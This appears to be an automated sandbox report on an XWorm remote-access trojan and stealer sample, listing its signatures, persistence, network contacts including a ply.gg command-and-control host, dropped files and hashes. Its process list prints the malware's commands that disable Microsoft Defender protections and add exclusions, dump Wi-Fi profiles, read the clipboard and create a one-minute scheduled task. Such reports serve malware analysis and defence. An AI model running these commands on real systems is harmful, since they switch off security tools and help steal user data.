Malware Analysis Report

2024-11-16 13:37

Sample ID: 240429-qkd9zsbg9t
Target: Output.exe
SHA256: e64455f4b8e898c1ebaf666344c0608bb344ca101126f543484ce2fc93cdc181
Tags: xworm persistence pyinstaller rat spyware stealer trojan upx
Score: 10/10


Analysis Overview

Score: 10/10

SHA256: e64455f4b8e898c1ebaf666344c0608bb344ca101126f543484ce2fc93cdc181

Threat Level: Known bad

The file Output.exe was found to be: Known bad.

Malicious Activity Summary

Tags: xworm persistence pyinstaller rat spyware stealer trojan upx

Detect Xworm Payload
Xworm
Executes dropped EXE
Drops startup file
Checks computer location settings
Reads user/profile data of web browsers
Loads dropped DLL
UPX packed file
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Adds Run key to start application
Unsigned PE
Enumerates physical storage devices
Detects Pyinstaller
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Detects videocard installed
Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-04-29 13:18

Signatures

Unsigned PE

Description | Indicator | Process | Target
--- | --- | --- | ---
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-04-29 13:18
Reported: 2024-04-29 13:20
Platform: win10v2004-20240226-en
Max time kernel: 39s
Max time network: 52s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Output.exe"

Signatures

Detect Xworm Payload

Count | Description | Indicator | Process | Target
--- | --- | --- | --- | ---
2 | N/A | N/A | N/A | N/A

Xworm

trojan rat xworm

Checks computer location settings

Description | Indicator | Process | Target
--- | --- | --- | ---
Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Output.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\XClient.exe | N/A

Drops startup file

Description | Indicator | Process | Target
--- | --- | --- | ---
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SoundPad.exe | C:\Users\Admin\SoundPad.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Gorillatag client.lnk | C:\Users\Admin\XClient.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Gorillatag client.lnk | C:\Users\Admin\XClient.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
--- | --- | --- | ---
N/A | N/A | C:\Users\Admin\SoundPad.exe | N/A
N/A | N/A | C:\Users\Admin\XClient.exe | N/A
N/A | N/A | C:\Users\Admin\SoundPad.exe | N/A

Loads dropped DLL

Count | Description | Indicator | Process | Target
--- | --- | --- | --- | ---
49 | N/A | N/A | C:\Users\Admin\SoundPad.exe | N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Count | Description | Indicator | Process | Target
--- | --- | --- | --- | ---
64 | N/A | N/A | N/A | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
--- | --- | --- | ---
Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Gorillatag client = "C:\\Users\\Admin\\Gorillatag client.exe" | C:\Users\Admin\XClient.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Count | Description | Indicator | Process | Target
--- | --- | --- | --- | ---
4 | N/A | discord.com | N/A | N/A
2 | N/A | raw.githubusercontent.com | N/A | N/A

Looks up external IP address via web service

Count | Description | Indicator | Process | Target
--- | --- | --- | --- | ---
2 | N/A | api.ipify.org | N/A | N/A

Detects Pyinstaller

pyinstaller
Description | Indicator | Process | Target
--- | --- | --- | ---
N/A | N/A | N/A | N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description | Indicator | Process | Target
--- | --- | --- | ---
N/A | N/A | C:\Windows\System32\schtasks.exe | N/A

Detects videocard installed

Description | Indicator | Process | Target
--- | --- | --- | ---
N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A

Suspicious behavior: EnumeratesProcesses

Count | Description | Indicator | Process | Target
--- | --- | --- | --- | ---
2 | N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
19 | N/A | N/A | C:\Users\Admin\SoundPad.exe | N/A
16 | N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
1 | N/A | N/A | C:\Users\Admin\XClient.exe | N/A

Suspicious use of AdjustPrivilegeToken

Count | Description | Indicator | Process | Target
--- | --- | --- | --- | ---
1 | Token: SeDebugPrivilege | N/A | C:\Users\Admin\XClient.exe | N/A
1 | Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
1 | Token: SeDebugPrivilege | N/A | C:\Users\Admin\SoundPad.exe | N/A
8 | Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
1 | Token: SeDebugPrivilege | N/A | C:\Users\Admin\XClient.exe | N/A
1 | Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
1 | Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
1 | Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
1 | Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
1 | Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
1 | Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
1 | Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
1 | Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
1 | Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
1 | Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
1 | Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
--- | --- | --- | ---
N/A | N/A | C:\Users\Admin\XClient.exe | N/A

Suspicious use of WriteProcessMemory

Count | Description | Indicator | Process | Target
--- | --- | --- | --- | ---
2 | PID 2240 wrote to memory of 3504 | N/A | C:\Users\Admin\AppData\Local\Temp\Output.exe | C:\Users\Admin\SoundPad.exe
2 | PID 2240 wrote to memory of 4992 | N/A | C:\Users\Admin\AppData\Local\Temp\Output.exe | C:\Users\Admin\XClient.exe
2 | PID 3504 wrote to memory of 4544 | N/A | C:\Users\Admin\SoundPad.exe | C:\Users\Admin\SoundPad.exe
2 | PID 4992 wrote to memory of 3844 | N/A | C:\Users\Admin\XClient.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2 | PID 4544 wrote to memory of 2136 | N/A | C:\Users\Admin\SoundPad.exe | C:\Windows\system32\cmd.exe
2 | PID 2136 wrote to memory of 1188 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\netsh.exe
2 | PID 4544 wrote to memory of 4584 | N/A | C:\Users\Admin\SoundPad.exe | C:\Windows\system32\cmd.exe
2 | PID 4584 wrote to memory of 4108 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2 | PID 4992 wrote to memory of 4480 | N/A | C:\Users\Admin\XClient.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2 | PID 4544 wrote to memory of 2524 | N/A | C:\Users\Admin\SoundPad.exe | C:\Windows\system32\cmd.exe
2 | PID 2524 wrote to memory of 1780 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2 | PID 2524 wrote to memory of 4492 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2 | PID 4992 wrote to memory of 3868 | N/A | C:\Users\Admin\XClient.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2 | PID 2524 wrote to memory of 2028 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2 | PID 2524 wrote to memory of 4712 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2 | PID 4992 wrote to memory of 1488 | N/A | C:\Users\Admin\XClient.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2 | PID 4992 wrote to memory of 3412 | N/A | C:\Users\Admin\XClient.exe | C:\Windows\System32\schtasks.exe
2 | PID 4544 wrote to memory of 2360 | N/A | C:\Users\Admin\SoundPad.exe | C:\Windows\system32\cmd.exe
2 | PID 2360 wrote to memory of 3636 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\Wbem\WMIC.exe
2 | PID 4544 wrote to memory of 748 | N/A | C:\Users\Admin\SoundPad.exe | C:\Windows\System32\Wbem\wmic.exe
2 | PID 4544 wrote to memory of 2440 | N/A | C:\Users\Admin\SoundPad.exe | C:\Windows\system32\cmd.exe
2 | PID 2440 wrote to memory of 2744 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\Wbem\WMIC.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Output.exe

"C:\Users\Admin\AppData\Local\Temp\Output.exe"

C:\Users\Admin\SoundPad.exe

"C:\Users\Admin\SoundPad.exe"

C:\Users\Admin\XClient.exe

"C:\Users\Admin\XClient.exe"

C:\Users\Admin\SoundPad.exe

"C:\Users\Admin\SoundPad.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\XClient.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Gorillatag client.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Gorillatag client.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Gorillatag client" /tr "C:\Users\Admin\Gorillatag client.exe"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\System32\Wbem\wmic.exe

wmic cpu get Name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid

Network

Country | Destination | Domain | Proto
--- | --- | --- | ---
US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 134.190.18.2.in-addr.arpa | udp
US | 8.8.8.8:53 | raw.githubusercontent.com | udp
US | 185.199.108.133:443 | raw.githubusercontent.com | tcp
US | 8.8.8.8:53 | 149.177.190.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp
US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp
US | 13.107.253.64:443 |  | tcp
US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp
GB | 23.44.234.16:80 |  | tcp
US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp
US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp
US | 8.8.8.8:53 | discord.com | udp
US | 162.159.128.233:443 | discord.com | tcp
US | 8.8.8.8:53 | 233.128.159.162.in-addr.arpa | udp
US | 8.8.8.8:53 | 19.ip.gl.ply.gg | udp
US | 147.185.221.19:38173 | 19.ip.gl.ply.gg | tcp
US | 8.8.8.8:53 | api.ipify.org | udp
US | 104.26.12.205:443 | api.ipify.org | tcp
US | 162.159.128.233:443 | discord.com | tcp
US | 8.8.8.8:53 | 205.12.26.104.in-addr.arpa | udp
US | 162.159.128.233:443 | discord.com | tcp
US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 159.113.53.23.in-addr.arpa | udp

Files

memory/2240-0-0x0000000000E10000-0x0000000001E12000-memory.dmp

memory/2240-1-0x00007FFE6DE90000-0x00007FFE6E951000-memory.dmp

C:\Users\Admin\SoundPad.exe

MD5 3b184b0bf9cae37d5a3f0025c43791f9
SHA1 4d384b79ec9bbef8cbc3ad85ee49914dca03888c
SHA256 b13f82bc8c09dd45d7cc4026ff2b9bb16ec302eef90bdb22e66bd8c9287b695f
SHA512 5d5e7030f49dff50933c1438f38c7dbdfd1e95b0e8155b4f16b2f6a205c6feff440c92588f0440ed543577dc2f25eabacd39730937a83615e01b5e798a19d51c

C:\Users\Admin\XClient.exe

MD5 b8a5902712f0159c808d05982f3f099f
SHA1 b5bc99d9f751a6d8618453761f6f1db7eb4ead59
SHA256 0325350841de44656ec17462500221ce09a1fd617cb56d1770a1ca6490b03713
SHA512 2b832adeadd64f094e7b83a29309636d4f2e8e2f8bdc9c798591d0f03874e7b02a0d26e940f8ceb709517be4d9ae771f12a7bab89b9c86f14d0229a7128a3d4d

memory/2240-97-0x00007FFE6DE90000-0x00007FFE6E951000-memory.dmp

memory/4992-96-0x00007FFE6DE90000-0x00007FFE6E951000-memory.dmp

memory/4992-114-0x0000000000120000-0x0000000000136000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI35042\python312.dll

MD5 2889fb28cd8f2f32997be99eb81fd7eb
SHA1 adfeb3a08d20e22dde67b60869c93291ca688093
SHA256 435430e3abfde589d8535bc24a4b1d4147a4971dbe59e9377603974c07a1b637
SHA512 aaa33b8178a8831008ea6ad39b05189d55aa228a20a2315e45df6e2ff590c94478cfc76c9adb762689edb021ecdf98df3e7074d8d65c1c477273056b7509f8ee

C:\Users\Admin\AppData\Local\Temp\_MEI35042\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

memory/4544-146-0x00007FFE6A580000-0x00007FFE6AC59000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI35042\_ctypes.pyd

MD5 76288ffffdce92111c79636f71b9bc9d
SHA1 15c10dcd31dab89522bf5b790e912dc7e6b3183b
SHA256 192cc2ac818c78cd21e9f969a95c0ff777d4cd5f79ae51ab7c366d2b8540f6a1
SHA512 29efc143cd72bf886e9bf54463706484f22222f024bd7e8cb206c32f40b76d823efd36061b05bbd6bcf562f83d95449acb3f1440c95e63750c643c15a10816c9

C:\Users\Admin\AppData\Local\Temp\_MEI35042\python3.DLL

MD5 6271a2fe61978ca93e60588b6b63deb2
SHA1 be26455750789083865fe91e2b7a1ba1b457efb8
SHA256 a59487ea2c8723277f4579067248836b216a801c2152efb19afee4ac9785d6fb
SHA512 8c32bcb500a94ff47f5ef476ae65d3b677938ebee26e80350f28604aaee20b044a5d55442e94a11ccd9962f34d22610b932ac9d328197cf4d2ffbc7df640efba

C:\Users\Admin\AppData\Local\Temp\_MEI35042\base_library.zip

MD5 630153ac2b37b16b8c5b0dbb69a3b9d6
SHA1 f901cd701fe081489b45d18157b4a15c83943d9d
SHA256 ec4e6b8e9f6f1f4b525af72d3a6827807c7a81978cb03db5767028ebea283be2
SHA512 7e3a434c8df80d32e66036d831cbd6661641c0898bd0838a07038b460261bf25b72a626def06d0faa692caf64412ca699b1fa7a848fe9d969756e097cba39e41

memory/4544-154-0x00007FFE7EAD0000-0x00007FFE7EAF5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI35042\_bz2.pyd

MD5 f991618bfd497e87441d2628c39ea413
SHA1 98819134d64f44f83a18985c2ec1e9ee8b949290
SHA256 333c06fad79094d43465d128d68078296c925d1ea2b6b5bf13072a8d5cb65e7e
SHA512 3a9ecb293abedcdba3493feb7d19f987735ced5a5194abaa1d1e00946e7ea0f878dd71868eb3d9bfec80432df862367661b825c9e71409c60ec73d1708a63ef6

memory/4544-160-0x00007FFE7E710000-0x00007FFE7E729000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI35042\_lzma.pyd

MD5 f07f0cfe4bc118aebcde63740635a565
SHA1 44ee88102830434bb9245934d6d4456c77c7b649
SHA256 cc5302895aa164d5667d0df3ebeeee804384889b01d38182b3f7179f3c4ff8c0
SHA512 fcd701903ccd454a661c27835b53f738d947f38e9d67620f52f12781a293e42ae6b96c260600396883d95dd5f536dba2874aaee083adbcc78d66873cefc8e99d

C:\Users\Admin\AppData\Local\Temp\_MEI35042\_wmi.pyd

MD5 f3767430bbc7664d719e864759b806e4
SHA1 f27d26e99141f15776177756de303e83422f7d07
SHA256 787caad25cb4e2df023ead5e5a3fcd160b1c59a2e4ae1fc7b25c5087964defe8
SHA512 b587dfff4ba86142663de6ef8710ac7ab8831ca5fc989820b6a197bcd31ac5fdcb0b5982bf9a1fc13b331d0e53dc1b7367b54bb47910f3d1e18f8193449acb9c

memory/4544-181-0x00007FFE75180000-0x00007FFE751AD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI35042\_uuid.pyd

MD5 7a00ff38d376abaaa1394a4080a6305b
SHA1 d43a9e3aa3114e7fc85c851c9791e839b3a0ee13
SHA256 720e9b68c41c8d9157865e4dd243fb1731f627f3af29c43250804a5995a82016
SHA512 ce39452df539eeeff390f260c062a0c902557fda25a7be9a58274675b82b30bddb7737b242e525f7d501db286f4873b901d94e1cd09aa8864f052594f4b34789

C:\Users\Admin\AppData\Local\Temp\_MEI35042\_ssl.pyd

MD5 8696f07039706f2e444f83bb05a65659
SHA1 6c6fff6770a757e7c4b22e6e22982317727bf65b
SHA256 5405af77bc6ad0c598490b666c599c625195f7bf2a63db83632e3a416c73e371
SHA512 93e9f8fc1ae8a458eb4d9e7d7294b5c2230cb753386842e72d07cb7f43f248d204d13d93aedae95ec1a7aa6a81a7c09fdba56a0bc31924a1722c423473d97758

C:\Users\Admin\AppData\Local\Temp\_MEI35042\_socket.pyd

MD5 7e92d1817e81cbafdbe29f8bec91a271
SHA1 08868b9895196f194b2e054c04edccf1a4b69524
SHA256 19573ccc379190277674a013f35bf055f6dbb57adfce79152152a0de3ff8c87c
SHA512 0ed41a3ce83b8f4a492555a41881d292ece61d544f0a4df282f3cc37822255a7a32647724568c9a3b04d13fd3cc93eb080e54ac2ce7705b6b470454366be1cbe

C:\Users\Admin\AppData\Local\Temp\_MEI35042\select.pyd

MD5 c16b7b88792826c2238d3cf28ce773dd
SHA1 198b5d424a66c85e2c07e531242c52619d932afa
SHA256 b81be8cc053734f317ff4de3476dd8c383cc65fe3f2f1e193a20181f9ead3747
SHA512 7b1b2494fe0ef71869072d3c41ba1f2b67e3b9dcc36603d1503bb914d8b8e803dc1b66a3cbf0e45c43e4a5b7a8f44504a35d5e8e1090d857b28b7eba1b89c08a

C:\Users\Admin\AppData\Local\Temp\_MEI35042\_sqlite3.pyd

MD5 29a6551e9b7735a4cb4a61c86f4eb66c
SHA1 f552a610d64a181b675c70c3b730aa746e1612d0
SHA256 78c29a6479a0a2741920937d13d404e0c69d21f6bd76bdfec5d415857391b517
SHA512 54a322bfe5e34f0b6b713e22df312cfbde4a2b52240a920b2fa3347939cf2a1fecbeac44d7c1fa2355ee6dc714891acd3ee827d73131fd1e39fba390c3a444e6

C:\Users\Admin\AppData\Local\Temp\_MEI35042\_queue.pyd

MD5 8347192a8c190895ec8806a3291e70d9
SHA1 0a634f4bd15b7ce719d91f0c1332e621f90d3f83
SHA256 b1ad27547e8f7ab2d1ce829ca9bdcc2b332dc5c2ef4fe224ccb76c78821c7a19
SHA512 de6858ed68982844c405ca8aecf5a0aa62127807b783a154ba5d844b44f0f8f42828dc097ac4d0d1aa8366cdcab44b314effcb0020b65db4657df83b1b8f5fed

C:\Users\Admin\AppData\Local\Temp\_MEI35042\_overlapped.pyd

MD5 ed9cff0d68ba23aad53c3a5791668e8d
SHA1 a38c9886d0de7224e36516467803c66a2e71c7d9
SHA256 e88452d26499f51d48fe4b6bd95fc782bad809f0cb009d249aacf688b9a4e43f
SHA512 6020f886702d9ff6530b1f0dad548db6ad34171a1eb677cb1ba14d9a8943664934d0cfe68b642b1dd942a70e3ae375071591a66b709c90bd8a13303a54d2198b

C:\Users\Admin\AppData\Local\Temp\_MEI35042\_multiprocessing.pyd

MD5 0c942dacb385235a97e373bdbe8a1a5e
SHA1 cf864c004d710525f2cf1bec9c19ddf28984ca72
SHA256 d5161d4e260b2bb498f917307f1c21381d738833efc6e8008f2ebfb9447c583b
SHA512 ca10c6842634cec3cada209b61dd5b60d8ea63722e3a77aa05e8c61f64b1564febe9612b554a469927dbce877b6c29c357b099e81fa7e73ceeae04b8998aa5a5

C:\Users\Admin\AppData\Local\Temp\_MEI35042\_hashlib.pyd

MD5 caaea46ee25211cbdc762feb95dc1e4d
SHA1 1f900cc99c02f4300d65628c1b22ddf8f39a94d4
SHA256 3ef6e0e5bf3f1ea9713f534c496a96eded9d3394a64324b046a61222dab5073b
SHA512 68c2b1634fcca930c1651f550494a2ef187cf52dce8ff28f410ebed4d84487e3b08f6f70223a83b5313c564dcd293748f3c22f2a4218218e634e924c8390cf9a

C:\Users\Admin\AppData\Local\Temp\_MEI35042\_decimal.pyd

MD5 c2f5d61323fb7d08f90231300658c299
SHA1 a6b15204980e28fc660b5a23194348e6aded83fc
SHA256 a8ea1e613149d04e7ce637413aad6df636556916902718f64e57fdff44f959bb
SHA512 df22676b5268175562574078459820f11eedb06f2845c86398c54861e9e3fb92547e7341b497fb0e79e9d3abba655e6593b1049bf78818c0ba7b9c96e3748606

memory/4544-189-0x00007FFE7E780000-0x00007FFE7E78D000-memory.dmp

memory/4544-188-0x00007FFE7EA30000-0x00007FFE7EA3D000-memory.dmp

memory/4544-187-0x00007FFE75710000-0x00007FFE75729000-memory.dmp

memory/4544-186-0x00007FFE7EAB0000-0x00007FFE7EABD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI35042\_cffi_backend.cp312-win_amd64.pyd

MD5 886da52cb1d06bd17acbd5c29355a3f5
SHA1 45dee87aefb1300ec51f612c3b2a204874be6f28
